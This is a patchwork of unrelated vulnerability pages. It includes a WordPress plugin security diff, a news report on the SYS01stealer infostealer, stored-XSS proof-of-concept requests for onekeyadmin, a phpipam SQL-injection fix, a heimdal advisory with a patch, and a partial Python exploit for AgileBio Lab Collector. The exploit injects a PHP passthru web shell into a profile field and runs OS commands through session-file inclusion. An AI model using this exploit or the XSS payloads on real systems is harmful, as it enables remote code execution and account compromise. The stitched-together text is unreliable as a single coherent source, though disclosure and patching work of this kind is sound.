The JetBackup – WP Backup, Migrate & Restore plugin for WordPress is vulnerable to sensitive information disclosure in versions up to, and including, 1.4.0 due to a lack of proper capability checking on the backup_guard_get_manual_modal function called via an AJAX action. This makes it possible for subscriber-level attackers, and above, to invoke the function and obtain database table information.

**backup/trunk/BackupGuard.php**

r2341420

r2348984

 

338

338

{

339

339

    check\_ajax\_referer('backupGuardAjaxNonce', 'token');

340

 

    if (is\_admin()) {

 

340

    if (current\_user\_can( 'activate\_plugins' )) {

341

341

        require\_once(SG\_PUBLIC\_AJAX\_PATH.'modalManualBackup.php');

342

342

    }

…

…

 

404

404

        add\_action('wp\_ajax\_backup\_guard\_checkBackupCreation', 'backup\_guard\_check\_backup\_creation');

405

405

        add\_action('wp\_ajax\_backup\_guard\_checkRestoreCreation', 'backup\_guard\_check\_restore\_creation');

406

 

        add\_action('wp\_ajax\_backup\_guard\_cloudDropbox', 'backup\_guard\_cloud\_dropbox');

407

 

        add\_action('wp\_ajax\_backup\_guard\_cloudGdrive', 'backup\_guard\_cloud\_gdrive');

408

 

        add\_action('wp\_ajax\_backup\_guard\_cloudOneDrive', 'backup\_guard\_cloud\_oneDrive');

409

 

        add\_action('wp\_ajax\_backup\_guard\_cloudFtp', 'backup\_guard\_cloud\_ftp');

410

 

        add\_action('wp\_ajax\_backup\_guard\_cloudAmazon', 'backup\_guard\_cloud\_amazon');

 

406

        add\_action('wp\_ajax\_backup\_guard\_cloudDropbox', 'backup\_guard\_cloud\_dropbox');

 

407

   

 

408

        $pluginCapabilities = backupGuardGetCapabilities();

 

409

        if ($pluginCapabilities != BACKUP\_GUARD\_CAPABILITIES\_FREE) {

 

410

            require\_once dirname(\_\_FILE\_\_).'/BackupGuardPro.php';

 

411

        }

411

412

        add\_action('wp\_ajax\_backup\_guard\_curlChecker', 'backup\_guard\_curl\_checker');

412

413

        add\_action('wp\_ajax\_backup\_guard\_deleteBackup', 'backup\_guard\_delete\_backup');

…

…

 

503

504

add\_action('wp\_ajax\_nopriv\_backup\_guard\_awake', 'backup\_guard\_awake\_nopriv');

504

505

add\_action('admin\_post\_backup\_guard\_cloudDropbox', 'backup\_guard\_cloud\_dropbox');

505

 

add\_action('admin\_post\_backup\_guard\_cloudGdrive', 'backup\_guard\_cloud\_gdrive');

506

 

add\_action('admin\_post\_backup\_guard\_cloudOneDrive', 'backup\_guard\_cloud\_oneDrive');

507

 

508

 

function backup\_guard\_cloud\_oneDrive()

509

 

{

510

 

    require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudOneDrive.php');

511

 

}

512

506

513

507

function backup\_guard\_import\_key\_file()

…

…

 

577

571

function backup\_guard\_cloud\_dropbox()

578

572

{

579

 

    check\_ajax\_referer('backupGuardAjaxNonce', 'token');

580

 

    require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudDropbox.php');

581

 

}

582

 

583

 

function backup\_guard\_cloud\_ftp()

584

 

{

585

 

    require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudFtp.php');

586

 

}

587

 

588

 

function backup\_guard\_cloud\_amazon()

589

 

{

590

 

    check\_ajax\_referer('backupGuardAjaxNonce', 'token');

591

 

    require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudAmazon.php');

592

 

}

593

 

594

 

function backup\_guard\_cloud\_gdrive()

595

 

{

596

 

    check\_ajax\_referer('backupGuardAjaxNonce', 'token');

597

 

    require\_once(SG\_PUBLIC\_AJAX\_PATH.'cloudGdrive.php');

 

573

    if (current\_user\_can('activate\_plugins')) {

 

574

        check\_ajax\_referer('backupGuardAjaxNonce', 'token');

 

575

        require\_once(SG\_PUBLIC\_AJAX\_PATH . 'cloudDropbox.php');

 

576

    }

598

577

}

599

578

…

…

 

731

710

    backup\_guard\_register\_ajax\_callbacks();

732

711

    // backupGuardPluginRedirect();

733

 

 

712

 

734

713

    //check if database should be updated

735

714

    if (backupGuardShouldUpdate()) {

…

…

 

748

727

749

728

function sgBackupAdminInit() {

750

 

    //load pro plugin updater

751

 

    $pluginCapabilities = backupGuardGetCapabilities();

752

 

    $isLoggedIn = is\_user\_logged\_in();

753

 

754

 

    if ($pluginCapabilities != BACKUP\_GUARD\_CAPABILITIES\_FREE && $isLoggedIn) {

755

 

        require\_once(dirname(\_\_FILE\_\_).'/plugin-update-checker/plugin-update-checker.php');

756

 

        require\_once(dirname(\_\_FILE\_\_).'/plugin-update-checker/Puc/v4/Utils.php');

757

 

        require\_once(SG\_LIB\_PATH.'SGAuthClient.php');

758

 

759

 

        $licenseKey = SGConfig::get('SG\_LICENSE\_KEY');

760

 

761

 

        $updateChecker = Puc\_v4\_Factory::buildUpdateChecker(

762

 

            BackupGuard\\Config::URL.'/products/details/'.$licenseKey,

763

 

            SG\_BACKUP\_GUARD\_MAIN\_FILE,

764

 

            SG\_PRODUCT\_IDENTIFIER

765

 

        );

766

 

767

 

        $updateChecker->addHttpRequestArgFilter(array(

768

 

            SGAuthClient::getInstance(),

769

 

            'filterUpdateChecks'

770

 

        ));

771

 

    }

 

729

    //load pro plugin updater

 

730

    $pluginCapabilities = backupGuardGetCapabilities();

 

731

    $isLoggedIn = is\_user\_logged\_in();

 

732

 

733

    if ($pluginCapabilities != BACKUP\_GUARD\_CAPABILITIES\_FREE && $isLoggedIn) {

 

734

        require\_once(dirname(\_\_FILE\_\_).'/plugin-update-checker/plugin-update-checker.php');

 

735

        require\_once(dirname(\_\_FILE\_\_).'/plugin-update-checker/Puc/v4/Utils.php');

 

736

        require\_once(SG\_LIB\_PATH.'SGAuthClient.php');

 

737

 

738

        $licenseKey = SGConfig::get('SG\_LICENSE\_KEY');

 

739

 

740

        $updateChecker = Puc\_v4\_Factory::buildUpdateChecker(

 

741

            BackupGuard\\Config::URL.'/products/details/'.$licenseKey,

 

742

            SG\_BACKUP\_GUARD\_MAIN\_FILE,

 

743

            SG\_PRODUCT\_IDENTIFIER

 

744

        );

 

745

 

746

        $updateChecker->addHttpRequestArgFilter(array(

 

747

            SGAuthClient::getInstance(),

 

748

            'filterUpdateChecks'

 

749

        ));

 

750

    }

772

751

}

773

752

**backup/trunk/README.txt**

r2341420

r2348984

 

7

7

Requires at least: 3.8

8

8

Tested up to: 5.4.2

9

 

Stable tag: 1.4.0

 

9

Stable tag: 1.4.1

10

10

License: GPLv2 or later

11

11

License URI: http://www.gnu.org/licenses/gpl-2.0.html

…

…

 

61

61

See <strong>BackupGuard Pro</strong> in action here: <a href="https://www.youtube.com/watch?v=TSPgmrSu-ls">https://www.youtube.com/watch?v=TSPgmrSu-ls</a>

62

62

63

 

<h4>A special note on WordPress migration</h4>

 

63

<h4>A SPECIAL NOTE ON WORDPRESS MIGRATION/h4>

64

64

65

65

A WordPress site migration is an easy task if performed properly. There are three different migration scenarios:

…

…

 

70

70

</ul>

71

71

72

 

Backup Guard Pro helps you to migrate in all of these cases in the smoothest possible way. You just have to Backup your site and Restore it in the new location. No additional work will be required, since we handle all changes for you.

73

 

74

 

The issues that users always deal with are: wrong site url, images don't load, dashboard not accessible, permalinks don't work and more.

75

 

76

 

Backup Guard Pro will help you to skip all these problems, because of its advanced refactoring and migrating engine.

 

72

Backup Guard free version will help you migrate your website in case there is no change in the domain or the Database prefix.

 

73

If there is any change in the domain or the DB prefix, Backup Guard Pro will be of use.

 

74

 

75

Backup Guard Pro helps you to migrate in all of the above mentioned three cases in the smoothest possible way. You just have to Backup your site and Restore it in the new location. No additional work will be required, since we handle all changes for you.

 

76

 

77

The issues that users always deal with are: wrong site URL, images not loading, dashboard not being accessible, permalinks not working and more.

 

78

 

79

Backup Guard Pro will help you to skip all these problems because of its advanced refactoring and migrating engine.

77

80

78

81

<h4>Documentation</h4>

…

…

 

109

112

</ul>

110

113

 

114

\= Does Backup Guard provide migration with the free version? =

 

115

 

116

It is possible to use migration with the free version if:

 

117

1\. There is no change in the domain.

 

118

2\. There is no change in the Database prefix.

 

119

Please note that even a single symbol change counts as a migration that should be done with the Pro version

 

120

111

121

\= Can I use BackupGuard to migrate a website? =

112

122

…

…

 

158

168

159

169

\== Changelog ==

 

170

\= 1.4.1 =

 

171

\* Security improvement

 

172

\* Some environment checks were carried out which ensure that the plugin works seamlessly. The mentioned checks are necessary for the plugin to work as intended.

 

173

160

174

\= 1.4.0 =

161

175

\* Plugin security improvements

**backup/trunk/backup.php**

r2341420

r2348984

 

5

5

 \* Plugin URI:        https://backup-guard.com/products/backup-wordpress

6

6

 \* Description:       Backup Guard is the most complete site backup and restore plugin. We offer the easiest way to backup, restore or migrate your site. You can backup your files, database or both.

7

 

 \* Version:           1.4.0

 

7

 \* Version:           1.4.1

8

8

 \* Author:            BackupGuard

9

9

 \* Author URI:        https://backup-guard.com/products/backup-wordpress

…

…

 

17

17

18

18

if (!defined('SG\_BACKUP\_GUARD\_VERSION')) {

19

 

    define('SG\_BACKUP\_GUARD\_VERSION', '1.4.0');

 

19

    define('SG\_BACKUP\_GUARD\_VERSION', '1.4.1');

20

20

}

21

21

**backup/trunk/com/core/SGBoot.php**

r2309221

r2348984

 

72

72

    private static function installConfigTable($sgdb)

73

73

    {

74

 

        //drop config table

75

 

        $sgdb->query('DROP TABLE IF EXISTS \`'.SG\_CONFIG\_TABLE\_NAME.'\`;');

76

 

 

74

        $dbEngine = backupGuardGetDatabaseEngine();

77

75

        //create config table

78

76

        $res = $sgdb->query(

…

…

 

81

79

              \`cvalue\` text NOT NULL,

82

80

              PRIMARY KEY (\`ckey\`)

83

 

            ) DEFAULT CHARSET=utf8;'

 

81

            ) ENGINE='.$dbEngine.' DEFAULT CHARSET=utf8;'

84

82

        );

85

83

        if ($res===false) {

…

…

 

110

108

    private static function installScheduleTable($sgdb)

111

109

    {

112

 

        //drop schedule table

113

 

        $sgdb->query('DROP TABLE IF EXISTS \`'.SG\_SCHEDULE\_TABLE\_NAME.'\`;');

 

110

        $dbEngine = backupGuardGetDatabaseEngine();

114

111

115

112

        //create schedule table

…

…

 

122

119

              \`backup\_options\` text NOT NULL,

123

120

              PRIMARY KEY (\`id\`)

124

 

            ) DEFAULT CHARSET=utf8;'

 

121

            ) ENGINE='.$dbEngine.' DEFAULT CHARSET=utf8;'

125

122

        );

126

123

        if ($res===false) {

…

…

 

133

130

    private static function installActionTable($sgdb)

134

131

    {

135

 

        //drop action table

136

 

        $sgdb->query('DROP TABLE IF EXISTS \`'.SG\_ACTION\_TABLE\_NAME.'\`;');

 

132

        $dbEngine = backupGuardGetDatabaseEngine();

137

133

138

134

        //create action table

…

…

 

149

145

              \`options\` text NOT NULL,

150

146

              PRIMARY KEY (\`id\`)

151

 

            ) DEFAULT CHARSET=utf8;"

 

147

            ) ENGINE=".$dbEngine." DEFAULT CHARSET=utf8;"

152

148

        );

153

149

        if ($res===false) {

**backup/trunk/com/core/functions.php**

r2309221

r2348984

 

724

724

}

725

725

 

726

function checkAllMissedTables()

 

727

{

 

728

    $sgdb = SGDatabase::getInstance();

 

729

    $allTables = array(SG\_CONFIG\_TABLE\_NAME, SG\_SCHEDULE\_TABLE\_NAME, SG\_ACTION\_TABLE\_NAME);

 

730

    $missedTables = array();

 

731

    $status = true;

 

732

   

 

733

    foreach ($allTables as $table) {

 

734

        $query = $sgdb->query("SELECT count(\*) as isExists

 

735

            FROM information\_schema.TABLES

 

736

            WHERE (TABLE\_SCHEMA = '".DB\_NAME."') AND (TABLE\_NAME = '$table')"

 

737

        );

 

738

       

 

739

        if (empty($query\[0\]\['isExists'\])) {

 

740

            $status = false;

 

741

        }

 

742

    }

 

743

   

 

744

    return $status;

 

745

}

 

746

726

747

function backupGuardIncludeFile($filePath)

727

748

{

**backup/trunk/com/core/notice/SGNoticeHandler.php**

r2246797

r2348984

 

9

9

        $this->checkRestoreNotWritableError();

10

10

        $this->checkLiteSpeedWarning();

 

11

        $this->checkTables();

 

12

        $this->checkPingFilePermission();

11

13

    }

12

14

…

…

 

21

23

                SGNotice::getInstance()->addNoticeFromTemplate('timeout\_free\_error', SG\_NOTICE\_ERROR, true);

22

24

            }

 

25

        }

 

26

    }

 

27

   

 

28

    public function checkTables()

 

29

    {

 

30

        if (!checkAllMissedTables()) {

 

31

            SGNotice::getInstance()->addNoticeFromTemplate('missed\_table', SG\_NOTICE\_ERROR, true);

23

32

        }

24

33

    }

…

…

 

60

69

        }

61

70

    }

 

71

   

 

72

    private function checkPingFilePermission()

 

73

    {

 

74

        if (file\_exists(SG\_PING\_FILE\_PATH) && !is\_readable(SG\_PING\_FILE\_PATH)) {

 

75

            SGNotice::getInstance()->addNoticeFromTemplate('ping\_permission', SG\_NOTICE\_ERROR, true);

 

76

        }

 

77

    }

62

78

}

**backup/trunk/public/include/functions.php**

r2246797

r2348984

 

224

224

        return SG\_FORCE\_DB\_TABLES\_RESET;

225

225

    }

 

226

   

 

227

    if (!checkAllMissedTables()) {

 

228

        return true;

 

229

    }

226

230

227

231

    return false;

 

232

}

 

233

 

234

function backupGuardGetDatabaseEngine()

 

235

{

 

236

    global $wpdb;

 

237

    $dbName = $wpdb->dbname;

 

238

    $engine = 'InnoDB';

 

239

    $engineCheckSql = "SELECT ENGINE FROM information\_schema.TABLES WHERE TABLE\_SCHEMA = '$dbName'";

 

240

    $result = $wpdb->get\_results($engineCheckSql, ARRAY\_A);

 

241

    if (!empty($result)) {

 

242

        $engineCheckSql = "SHOW TABLE STATUS WHERE Name = '".$wpdb->prefix."users' AND Engine = 'MyISAM'";

 

243

        $result = $wpdb->get\_results($engineCheckSql, ARRAY\_A);

 

244

        if (isset($result\[0\]\['Engine'\]) && $result\[0\]\['Engine'\] == 'MyISAM') {

 

245

            $engine = 'MyISAM';

 

246

        }

 

247

    }

 

248

 

249

    return $engine;

228

250

}

229

251

**backup/trunk/public/services.php**

r2313492

r2348984

 

17

17

                    <ul class="plugin-action-buttons">

18

18

                        <li>

19

 

                            <p id="sg-migration-service-price"><b>$59.95</b></p>

 

19

                            <p id="sg-migration-service-price"><b>$84.95</b></p>

20

20

                        </li>

21

21

                        <li>

CVE-2020-36668: Changeset 2348984 for backup – WordPress Plugin Repository

Cybersecurity researchers have discovered a new information stealer dubbed SYS01stealer targeting critical government infrastructure employees, manufacturing companies, and other sectors.
"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure

Data Safety / Cyber Threat

Cybersecurity researchers have discovered a new information stealer dubbed **SYS01stealer** targeting critical government infrastructure employees, manufacturing companies, and other sectors.

"The threat actors behind the campaign are targeting Facebook business accounts by using Google ads and fake Facebook profiles that promote things like games, adult content, and cracked software, etc. to lure victims into downloading a malicious file," Morphisec said in a report shared with The Hacker News.

"The attack is designed to steal sensitive information, including login data, cookies, and Facebook ad and business account information."

The Israeli cybersecurity company said the campaign was initially tied to a financially motivated cybercriminal operation dubbed Ducktail by Zscaler.

However, WithSecure, which first documented the Ducktail activity cluster in July 2022, said the two intrusion sets are different from one another, indicating how the threat actors managed to confuse attribution efforts and evade detection.

The attack chain, per Morphisec, commences when a victim is successfully lured into clicking on a URL from a fake Facebook profile or advertisement to download a ZIP archive that purports to be cracked software or adult-themed content.

Opening the ZIP file launches a based loader – typically a legitimate C# application – that's vulnerable to DLL side-loading, thereby making it possible to load a malicious dynamic link library (DLL) file alongside the app.

Some of the applications abused to side-load the rogue DLL are Western Digital's WDSyncService.exe and Garmin's ElevatedInstaller.exe. In some instances, the side-loaded DLL acts as a means to deploy Python and Rust-based intermediate executables.

Irrespective of the approach employed, all roads lead to the delivery of an installer that drops and executes the PHP-based SYS01stealer malware.

The stealer is engineered to harvest Facebook cookies from Chromium-based web browsers (e.g., Google Chrome, Microsoft Edge, Brave, Opera, and Vivaldi), exfiltrate the victim's Facebook information to a remote server, and download and run arbitrary files.

Discover the Latest Malware Evasion Tactics and Prevention Strategies

Ready to bust the 9 most dangerous myths about file-based attacks? Join our upcoming webinar and become a hero in the fight against patient zero infections and zero-day security events!

RESERVE YOUR SEAT

It's also equipped to upload files from the infected host to the command-and-control (C2) server, run commands sent by the server, and update itself when a new version is available.

The development comes as Bitdefender revealed a similar stealer campaign known as S1deload that's designed to hijack users' Facebook and YouTube accounts and leverage the compromised systems to mine cryptocurrency.

"DLL side-loading is a highly effective technique for tricking Windows systems into loading malicious code," Morphisec said.

"When an application loads in memory and search order is not enforced, the application loads the malicious file instead of the legitimate one, allowing threat actors to hijack legitimate, trusted, and even signed applications to load and execute malicious payloads."

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

SYS01stealer: New Threat Using Facebook Ads to Target Critical Infrastructure Firms

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the User Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：

<img src=1 onerror=alert("xss");>  
url  
http://192.168.3.129:8091/admin1#userGroup/index  
  
poc  
POST /admin1/userGroup/save HTTP/1.1  
Host: 192.168.3.129:8091  
Content-Length: 114  
Accept: _/_  
X-Requested-With: XMLHttpRequest  
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36  
Content-Type: application/json;charset=UTF-8  
Origin: http://192.168.3.129:8091  
Referer: http://192.168.3.129:8091/admin1/userGroup/index  
Accept-Encoding: gzip, deflate  
Accept-Language: zh-CN,zh;q=0.9  
Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def  
Connection: close

{"id":"","title":"test<img src=1 onerror=alert("xss");>","integral":0,"default":0,"status":1,"theme":"template"}  
  
then you can view xss in url  
http://192.168.3.129:8091/admin1#userGroup/index

CVE-2023-26954: Backstage member grouping - add storage xss vulnerability · Issue #11 · keheying/onekeyadmin

onekeyadmin v1.3.9 was discovered to contain a stored cross-site scripting (XSS) vulnerability via the Admin Group module.

1.  Vulnerability affects product:onekeyadmin
2.  Vulnerability affects version 1.3.9
3.  Vulnerability type:storage xss vulnerability（Cross-site scripting）
4.  Vulnerability Details：  
    <img src=1 onerror=alert("xss");>  
    url  
    http://192.168.3.129:8091/admin1#adminGroup/index

\`POST /admin1/adminGroup/save HTTP/1.1 Host: 192.168.3.129:8091 Content-Length: 95 Accept: \*/\* X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/json;charset=UTF-8 Origin: http://192.168.3.129:8091 Referer: http://192.168.3.129:8091/admin1/adminGroup/index Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=2acec6968a16dbf988b4f4a2d0a58def Connection: close

{"id":"","title":"<img src=1 onerror=alert("xss");>","status":1,"role":\[\],"theme":"template"}\`  

then you can view xss in  
url:  
http://192.168.3.129:8091/admin1#adminGroup/index

CVE-2023-26955: Background role management - there is a storage xss vulnerability in adding roles · Issue #6 · keheying/onekeyadmin

SQL Injection in GitHub repository phpipam/phpipam prior to v1.5.2.

@@ -673,7 +673,7 @@ public function update\_custom\_field\_definition ($field) {  
\# set type definition and size of needed if($field\['fieldType'\]=="bool" || $field\['fieldType'\]=="text" || $field\['fieldType'\]=="date" || $field\['fieldType'\]=="datetime") { $field\['ftype'\] = $field\['fieldType'\]; } else { $field\['ftype'\] = $field\['fieldType'\]."(".$field\['fieldSize'\].")"; } else { $field\['ftype'\] = $field\['fieldType'\]."( :enumset )"; }  
\# default value null $field\['fieldDefault'\] = is\_blank($field\['fieldDefault'\]) ? NULL : $field\['fieldDefault'\]; @@ -709,6 +709,7 @@ public function update\_custom\_field\_definition ($field) { $params = array(); if (strpos($query, ":default")>0) $params\['default'\] = $field\['fieldDefault'\]; if (strpos($query, ":comment")>0) $params\['comment'\] = $field\['Comment'\]; if (strpos($query, ":enumset")>0) $params\['enumset'\] = $field\['fieldSize'\];  
\# execute try { $res = $this\->Database\->runQuery($query, $params); }

CVE-2023-1211: Bugfix: SQL injection in custom field enum/set types · phpipam/phpipam@16e7a94

Cross-site Scripting (XSS) - Stored in GitHub repository phpipam/phpipam prior to v1.5.2.

CVE-2023-1212

The fix for CVE-2022-3437 included changing memcmp to be constant time and a workaround for a compiler bug by adding "!= 0" comparisons to the result of memcmp. When these patches were backported to the heimdal-7.7.1 and heimdal-7.8.0 branches (and possibly other branches) a logic inversion sneaked in causing the validation of message integrity codes in gssapi/arcfour to be inverted.

*   Products
    *   Openwall GNU/\*/Linux   _server OS_
    *   Linux Kernel Runtime Guard
    *   John the Ripper   _password cracker_
        *   Free & Open Source for any platform
        *   in the cloud
        *   Pro for Linux
        *   Pro for macOS
    *   Wordlists   _for password cracking_
    *   passwdqc   _policy enforcement_
        *   Free & Open Source for Unix
        *   Pro for Windows (Active Directory)
    *   yescrypt   _KDF & password hashing_
    *   yespower   _Proof-of-Work (PoW)_
    *   crypt\_blowfish   _password hashing_
    *   phpass   _ditto in PHP_
    *   tcb   _better password shadowing_
    *   Pluggable Authentication Modules
    *   scanlogd   _port scan detector_
    *   popa3d   _tiny POP3 daemon_
    *   blists   _web interface to mailing lists_
    *   msulogin   _single user mode login_
    *   php\_mt\_seed   _mt\_rand() cracker_
*   Services
*   Publications
    *   Articles
    *   Presentations
*   Resources
    *   Mailing lists
    *   Community wiki
    *   Source code repositories (GitHub)
    *   Source code repositories (CVSweb)
    *   File archive & mirrors
    *   How to verify digital signatures
    *   OVE IDs
*   What's new

\[<prev\] \[next>\] \[day\] \[month\] \[year\] \[list\]

Date: Wed, 8 Feb 2023 06:45:22 +0100
From: Helmut Grohne <helmut@...divi.de>
To: oss-security@...ts.openwall.com
Subject: \[vs\] heimdal: CVE-2022-45142: signature validation failure

Hi,

I am hereby publishing a vulnerability in heimdal backports by attaching
the exact mail sent to distros@...openwall.org last week.

----- Forwarded message from Helmut Grohne <helmut@...divi.de> -----

Date: Tue, 31 Jan 2023 15:52:58 +0100
From: Helmut Grohne <helmut@...divi.de>
To: distros@...openwall.org
Cc: heimdal-security@...mdal.team, Andrew Bartlett <abartlet@...ba.org>, Jeffrey Altman <jaltman@...ure-endpoints.com>, Joseph Sutton <josephsutton@...alyst.net.nz>, Nicolas Williams
	<nico@...sigma.com>, "Roberto C. Sánchez" <roberto@...exian.com>, Salvatore Bonaccorso <carnil@...ian.org>
Subject: \[vs\] heimdal: CVE-2022-45142: signature validation failure

(Resent with proper subject tag)

CVE-2022-3437 was a vulnerability affecting heimdal and samba. It was
fixed in both places. The fix included changing memcmp to be constant
time and a workaround for a compiler bug by adding "!= 0" comparisons to
the result of memcmp. When these patches were backported to the
heimdal-7.7.1 and heimdal-7.8.0 branches (and possibly other branches) a
logic inversion sneaked in causing the validation of message integrity
codes in gssapi/arcfour to be inverted.

This vulnerability does not affect samba nor the main heimdal branch and
only applies to backports. At least the 7.7.1 and 7.8.0 branches are
affected. CVE-2022-45142 has been assigned. All releases of Debian are
affected. At least one release of Fedora and Ubuntu are affected.

Timeline of events

2022-12-09 Issue discovered by me during backporting of patches
2022-12-09 Notified Debian security team
2022-12-09 Notified heimdal and samba
2022-12-09 Jeffrey Altman (heimdal) confirmed the problem
2022-12-10 Andrew Bartlett (samba) replied as not affected
2022-12-13 Patch v1
2022-12-13 Jeffrey Altman (heimdal) reviewed the patch
2022-12-13 Patch v2 (updated commit message)
2022-12-22 Last reply from heimdal (Jeffrey Altman) asking for more time
2022-12-25 Ping
2023-01-04 Ping
2023-01-13 Ping
2023-01-20 Ping and notified Ubuntu security team
2023-01-30 CVE-2022-45142 assigned
2023-01-31 Unilateral disclosure to distros mailinglist
2023-02-08 Proposed public disclosure to oss-sec

I would like to thank Salvatore Bonaccorso for handling most of the
coordination. Thanks also to go Jeffrey Altman and Andrew Bartlett for
their timely replies. My work on this issue is paid by Freexian SARL.

Patch below

Helmut

From: Helmut Grohne <helmut@...divi.de>
Subject: \[PATCH v3\] CVE-2022-45142: gsskrb5: fix accidental logic inversions

The referenced commit attempted to fix miscompilations with gcc-9 and
gcc-10 by changing \`memcmp(...)\` to \`memcmp(...) != 0\`. Unfortunately,
it also inverted the result of the comparison in two occasions. This
inversion happened during backporting the patch to 7.7.1 and 7.8.0.

Fixes: f6edaafcfefd ("gsskrb5: CVE-2022-3437 Use constant-time memcmp()
 for arcfour unwrap")
Signed-off-by: Helmut Grohne <helmut@...divi.de>
---
 lib/gssapi/krb5/arcfour.c | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

Changes since v1:
 \* Fix typo in commit message.
 \* Mention 7.8.0 in commit message. Thanks to Jeffrey Altman.

Changes since v2:
 \* Add CVE identifier.

diff --git a/lib/gssapi/krb5/arcfour.c b/lib/gssapi/krb5/arcfour.c
index e838d007a..eee6ad72f 100644
--- a/lib/gssapi/krb5/arcfour.c
+++ b/lib/gssapi/krb5/arcfour.c
@@ -365,7 +365,7 @@ \_gssapi\_verify\_mic\_arcfour(OM\_uint32 \* minor\_status,
 	return GSS\_S\_FAILURE;
     }

-    cmp = (ct\_memcmp(cksum\_data, p + 8, 8) == 0);
+    cmp = (ct\_memcmp(cksum\_data, p + 8, 8) != 0);
     if (cmp) {
 	\*minor\_status = 0;
 	return GSS\_S\_BAD\_MIC;
@@ -730,7 +730,7 @@ OM\_uint32 \_gssapi\_unwrap\_arcfour(OM\_uint32 \*minor\_status,
 	return GSS\_S\_FAILURE;
     }

-    cmp = (ct\_memcmp(cksum\_data, p0 + 16, 8) == 0); /\* SGN\_CKSUM \*/
+    cmp = (ct\_memcmp(cksum\_data, p0 + 16, 8) != 0); /\* SGN\_CKSUM \*/
     if (cmp) {
 	\_gsskrb5\_release\_buffer(minor\_status, output\_message\_buffer);
 	\*minor\_status = 0;
--
2.38.1

----- End forwarded message -----

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.

CVE-2022-45142: security - [vs] heimdal: CVE-2022-45142: signature validation failure

AgileBio Electronic Lab Notebook v4.234 was discovered to contain a local file inclusion vulnerability.

    # Exploit Title: Agilebio Lab Collector Electronic Lab Notebook Remote Code Execution# Date: 2023-02-28# Exploit Author: Anthony Cole# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/# Version: v4.234# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Tested on: PHP/MYSQL# CVE: CVE-2023-24217# Category: webapps#   # Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.#  from argparse import ArgumentParserfrom requests import Sessionfrom random import choicefrom string import ascii_lowercase, ascii_uppercase, digitsimport refrom base64 import b64encodefrom urllib.parse import quote_plussess:Session = Session()cookies = {}headers = {}state = {}def random_string(length:int) -> str:    return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))def login(base_url:str, username:str, password:str) -> bool:    data = {"login": username, "pass": password, "Submit":"", "action":"login"}    headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"    res = sess.post(f"{base_url}/login.php", data=data, headers=headers)    if("My profile" in res.text):        return res.text    else:        return None    def logout(base_url:str) -> bool:    headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update"    sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers)def extract_field_value(contents, name):    value = re.findall(f'name="{name}" value="(.*)"', contents)    if(len(value)):        return value[0]    else:        return ""def get_profile(html:str):    return {        "contact_name": extract_field_value(html, "contact_name"),        "contact_lab": extract_field_value(html, "contact_lab"),        "contact_address": extract_field_value(html, "contact_address"),        "contact_city": extract_field_value(html, "contact_city"),        "contact_zip": extract_field_value(html, "contact_zip"),        "contact_country": extract_field_value(html, "contact_country"),        "contact_tel": extract_field_value(html, "contact_tel"),        "contact_email": extract_field_value(html, "contact_email")    }def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:    headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update"    res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers)    return Truedef execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):    session_file = sess.cookies.get("PHPSESSID")    headers["Referer"] = f"{base_url}/login.php?%2F"    page = f"../../../../../..{session_path}/sess_{session_file}"    res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers)    return parse_output(res.text, wrapper)def exploit(args) -> None:    wrapper = random_string(5)    param = random_string(3)    html = login(args.url, args.login_username, args.login_password)        if(html == None):        print("unable to login")        return False        clean = get_profile(html)    data = get_profile(html)    tag = b64encode(wrapper.encode()).decode()    payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>"            data["contact_name"] = payload #inject payload in name field    if(update_profile(args.url, wrapper, param, data)):        login(args.url, args.login_username, args.login_password) # reload the session w/ our payload        print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))        update_profile(args.url, wrapper, param, clean) # revert the profile        logout(args.url)    def parse_output(contents, wrapper) -> None:    matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL)    if(len(matches)):        return matches[0]        return Nonedef main() -> None:    parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217")    parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.")    parser.add_argument("--login-username", "-lu", required=True, help="Username.")    parser.add_argument("--login-password", "-lp", required=True, help="Password.")    parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.")    